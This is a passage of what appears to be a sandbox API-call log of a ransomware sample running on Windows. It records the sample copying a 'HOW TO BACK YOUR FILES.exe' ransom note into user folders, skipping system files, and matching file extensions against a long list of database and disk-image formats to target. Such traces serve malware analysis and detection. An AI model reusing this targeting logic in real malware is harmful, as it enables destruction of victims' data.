ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49b82fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0057.976] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0057.976] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d23c8 [0057.976] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Videos", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Videos") returned="C:\\Users\\Default User\\Videos" [0057.976] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e65a0 | out: hHeap=0x2b0000) returned 1 [0057.976] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0057.976] lstrlenW (lpString="C:\\Users\\Default User\\Videos") returned 28 [0057.976] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Videos" | out: lpString1="C:\\Users\\Default User\\Videos") returned="C:\\Users\\Default User\\Videos" [0057.976] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.976] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0057.976] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0057.977] GetLastError () returned 0x0 [0057.977] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0057.977] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0057.977] CloseHandle (hObject=0x118) returned 1 [0057.977] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0057.977] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.977] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Videos\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49b82fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0057.977] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.977] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.977] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.977] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49b82fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.977] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.977] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0057.977] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.977] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.977] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0057.977] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.977] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0057.977] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0057.977] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0057.977] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0057.977] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0057.977] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0057.977] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0057.978] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0057.978] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0057.978] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0057.978] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0057.978] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0057.978] lstrlenW (lpString="desktop.ini") returned 11 [0057.978] lstrlenW (lpString="C:\\Users\\Default User\\Videos\\*") returned 30 [0057.978] lstrcpyW (in: lpString1=0x2cce43a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0057.978] lstrlenW (lpString="desktop.ini") returned 11 [0057.978] lstrlenW (lpString="Ares865") returned 7 [0057.978] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0057.978] lstrlenW (lpString=".dll") returned 4 [0057.978] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0057.978] lstrlenW (lpString=".lnk") returned 4 [0057.978] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0057.978] lstrlenW (lpString=".ini") returned 4 [0057.978] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0057.978] lstrlenW (lpString=".sys") returned 4 [0057.978] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0057.978] lstrlenW (lpString="desktop.ini") returned 11 [0057.978] lstrlenW (lpString="bak") returned 3 [0057.978] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0057.978] lstrlenW (lpString="ba_") returned 3 [0057.978] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0057.978] lstrlenW (lpString="dbb") returned 3 [0057.978] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0057.978] lstrlenW (lpString="vmdk") returned 4 [0057.978] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0057.978] lstrlenW (lpString="rar") returned 3 [0057.978] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0057.978] lstrlenW (lpString="zip") returned 3 [0057.978] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0057.978] lstrlenW (lpString="tgz") returned 3 [0057.978] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0057.978] lstrlenW (lpString="vbox") returned 4 [0057.978] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0057.978] lstrlenW (lpString="vdi") returned 3 [0057.979] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0057.979] lstrlenW (lpString="vhd") returned 3 [0057.979] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0057.979] lstrlenW (lpString="vhdx") returned 4 [0057.979] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0057.979] lstrlenW (lpString="avhd") returned 4 [0057.979] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0057.979] lstrlenW (lpString="db") returned 2 [0057.979] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0057.979] lstrlenW (lpString="db2") returned 3 [0057.979] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0057.979] lstrlenW (lpString="db3") returned 3 [0057.979] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0057.979] lstrlenW (lpString="dbf") returned 3 [0057.979] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0057.979] lstrlenW (lpString="mdf") returned 3 [0057.979] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0057.979] lstrlenW (lpString="mdb") returned 3 [0057.979] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0057.979] lstrlenW (lpString="sql") returned 3 [0057.979] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0057.979] lstrlenW (lpString="sqlite") returned 6 [0057.979] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0057.979] lstrlenW (lpString="sqlite3") returned 7 [0057.979] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0057.979] lstrlenW (lpString="sqlitedb") returned 8 [0057.979] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0057.979] lstrlenW (lpString="xml") returned 3 [0057.979] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0057.979] lstrlenW (lpString="$er") returned 3 [0057.979] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0057.979] lstrlenW (lpString="4dd") returned 3 [0057.980] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0057.980] lstrlenW (lpString="4dl") returned 3 [0057.980] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0057.980] lstrlenW (lpString="^^^") returned 3 [0057.980] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0057.980] lstrlenW (lpString="abs") returned 3 [0057.980] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0057.980] lstrlenW (lpString="abx") returned 3 [0057.980] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0057.980] lstrlenW (lpString="accdb") returned 5 [0057.980] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0057.980] lstrlenW (lpString="accdc") returned 5 [0057.980] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0057.980] lstrlenW (lpString="accde") returned 5 [0057.980] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0057.980] lstrlenW (lpString="accdr") returned 5 [0057.980] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0057.980] lstrlenW (lpString="accdt") returned 5 [0057.980] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0057.980] lstrlenW (lpString="accdw") returned 5 [0057.980] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0057.980] lstrlenW (lpString="accft") returned 5 [0057.980] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0057.980] lstrlenW (lpString="adb") returned 3 [0057.980] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0057.980] lstrlenW (lpString="adb") returned 3 [0057.980] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0057.980] lstrlenW (lpString="ade") returned 3 [0057.980] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0057.980] lstrlenW (lpString="adf") returned 3 [0057.980] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0057.980] lstrlenW (lpString="adn") returned 3 [0057.980] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0057.980] lstrlenW (lpString="adp") returned 3 [0057.980] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0057.980] lstrlenW (lpString="alf") returned 3 [0057.980] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0057.980] lstrlenW (lpString="ask") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0057.981] lstrlenW (lpString="btr") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0057.981] lstrlenW (lpString="cat") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0057.981] lstrlenW (lpString="cdb") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0057.981] lstrlenW (lpString="ckp") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0057.981] lstrlenW (lpString="cma") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0057.981] lstrlenW (lpString="cpd") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0057.981] lstrlenW (lpString="dacpac") returned 6 [0057.981] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0057.981] lstrlenW (lpString="dad") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0057.981] lstrlenW (lpString="dadiagrams") returned 10 [0057.981] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0057.981] lstrlenW (lpString="daschema") returned 8 [0057.981] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0057.981] lstrlenW (lpString="db-journal") returned 10 [0057.981] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0057.981] lstrlenW (lpString="db-shm") returned 6 [0057.981] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0057.981] lstrlenW (lpString="db-wal") returned 6 [0057.981] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0057.981] lstrlenW (lpString="dbc") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0057.981] lstrlenW (lpString="dbs") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0057.981] lstrlenW (lpString="dbt") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0057.981] lstrlenW (lpString="dbv") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0057.981] lstrlenW (lpString="dbx") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0057.981] lstrlenW (lpString="dcb") returned 3 [0057.981] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0057.982] lstrlenW (lpString="dct") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0057.982] lstrlenW (lpString="dcx") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0057.982] lstrlenW (lpString="ddl") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0057.982] lstrlenW (lpString="dlis") returned 4 [0057.982] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0057.982] lstrlenW (lpString="dp1") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0057.982] lstrlenW (lpString="dqy") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0057.982] lstrlenW (lpString="dsk") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0057.982] lstrlenW (lpString="dsn") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0057.982] lstrlenW (lpString="dtsx") returned 4 [0057.982] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0057.982] lstrlenW (lpString="dxl") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0057.982] lstrlenW (lpString="eco") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0057.982] lstrlenW (lpString="ecx") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0057.982] lstrlenW (lpString="edb") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0057.982] lstrlenW (lpString="epim") returned 4 [0057.982] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0057.982] lstrlenW (lpString="fcd") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0057.982] lstrlenW (lpString="fdb") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0057.982] lstrlenW (lpString="fic") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0057.982] lstrlenW (lpString="flexolibrary") returned 12 [0057.982] lstrlenW (lpString="fm5") returned 3 [0057.982] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0057.982] lstrlenW (lpString="fmp") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0057.983] lstrlenW (lpString="fmp12") returned 5 [0057.983] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0057.983] lstrlenW (lpString="fmpsl") returned 5 [0057.983] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0057.983] lstrlenW (lpString="fol") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0057.983] lstrlenW (lpString="fp3") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0057.983] lstrlenW (lpString="fp4") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0057.983] lstrlenW (lpString="fp5") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0057.983] lstrlenW (lpString="fp7") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0057.983] lstrlenW (lpString="fpt") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0057.983] lstrlenW (lpString="frm") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0057.983] lstrlenW (lpString="gdb") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0057.983] lstrlenW (lpString="gdb") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0057.983] lstrlenW (lpString="grdb") returned 4 [0057.983] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0057.983] lstrlenW (lpString="gwi") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0057.983] lstrlenW (lpString="hdb") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0057.983] lstrlenW (lpString="his") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0057.983] lstrlenW (lpString="ib") returned 2 [0057.983] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0057.983] lstrlenW (lpString="idb") returned 3 [0057.983] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0057.983] lstrlenW (lpString="ihx") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0057.984] lstrlenW (lpString="itdb") returned 4 [0057.984] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0057.984] lstrlenW (lpString="itw") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0057.984] lstrlenW (lpString="jet") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0057.984] lstrlenW (lpString="jtx") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0057.984] lstrlenW (lpString="kdb") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0057.984] lstrlenW (lpString="kexi") returned 4 [0057.984] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0057.984] lstrlenW (lpString="kexic") returned 5 [0057.984] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0057.984] lstrlenW (lpString="kexis") returned 5 [0057.984] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0057.984] lstrlenW (lpString="lgc") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0057.984] lstrlenW (lpString="lwx") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0057.984] lstrlenW (lpString="maf") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0057.984] lstrlenW (lpString="maq") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0057.984] lstrlenW (lpString="mar") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0057.984] lstrlenW (lpString="marshal") returned 7 [0057.984] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0057.984] lstrlenW (lpString="mas") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0057.984] lstrlenW (lpString="mav") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0057.984] lstrlenW (lpString="maw") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0057.984] lstrlenW (lpString="mdbhtml") returned 7 [0057.984] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0057.984] lstrlenW (lpString="mdn") returned 3 [0057.984] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0057.985] lstrlenW (lpString="mdt") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0057.985] lstrlenW (lpString="mfd") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0057.985] lstrlenW (lpString="mpd") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0057.985] lstrlenW (lpString="mrg") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0057.985] lstrlenW (lpString="mud") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0057.985] lstrlenW (lpString="mwb") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0057.985] lstrlenW (lpString="myd") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0057.985] lstrlenW (lpString="ndf") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0057.985] lstrlenW (lpString="nnt") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0057.985] lstrlenW (lpString="nrmlib") returned 6 [0057.985] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0057.985] lstrlenW (lpString="ns2") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0057.985] lstrlenW (lpString="ns3") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0057.985] lstrlenW (lpString="ns4") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0057.985] lstrlenW (lpString="nsf") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0057.985] lstrlenW (lpString="nv") returned 2 [0057.985] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0057.985] lstrlenW (lpString="nv2") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0057.985] lstrlenW (lpString="nwdb") returned 4 [0057.985] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0057.985] lstrlenW (lpString="nyf") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0057.985] lstrlenW (lpString="odb") returned 3 [0057.985] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0057.985] lstrlenW (lpString="odb") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0057.986] lstrlenW (lpString="oqy") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0057.986] lstrlenW (lpString="ora") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0057.986] lstrlenW (lpString="orx") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0057.986] lstrlenW (lpString="owc") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0057.986] lstrlenW (lpString="p96") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0057.986] lstrlenW (lpString="p97") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0057.986] lstrlenW (lpString="pan") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0057.986] lstrlenW (lpString="pdb") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0057.986] lstrlenW (lpString="pdm") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0057.986] lstrlenW (lpString="pnz") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0057.986] lstrlenW (lpString="qry") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0057.986] lstrlenW (lpString="qvd") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0057.986] lstrlenW (lpString="rbf") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0057.986] lstrlenW (lpString="rctd") returned 4 [0057.986] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0057.986] lstrlenW (lpString="rod") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0057.986] lstrlenW (lpString="rodx") returned 4 [0057.986] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0057.986] lstrlenW (lpString="rpd") returned 3 [0057.986] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0057.987] lstrlenW (lpString="rsd") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0057.987] lstrlenW (lpString="sas7bdat") returned 8 [0057.987] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0057.987] lstrlenW (lpString="sbf") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0057.987] lstrlenW (lpString="scx") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0057.987] lstrlenW (lpString="sdb") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0057.987] lstrlenW (lpString="sdc") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0057.987] lstrlenW (lpString="sdf") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0057.987] lstrlenW (lpString="sis") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0057.987] lstrlenW (lpString="spq") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0057.987] lstrlenW (lpString="te") returned 2 [0057.987] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0057.987] lstrlenW (lpString="teacher") returned 7 [0057.987] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0057.987] lstrlenW (lpString="tmd") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0057.987] lstrlenW (lpString="tps") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0057.987] lstrlenW (lpString="trc") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0057.987] lstrlenW (lpString="trc") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0057.987] lstrlenW (lpString="trm") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0057.987] lstrlenW (lpString="udb") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0057.987] lstrlenW (lpString="udl") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0057.987] lstrlenW (lpString="usr") returned 3 [0057.987] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0057.988] lstrlenW (lpString="v12") returned 3 [0057.988] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0057.988] lstrlenW 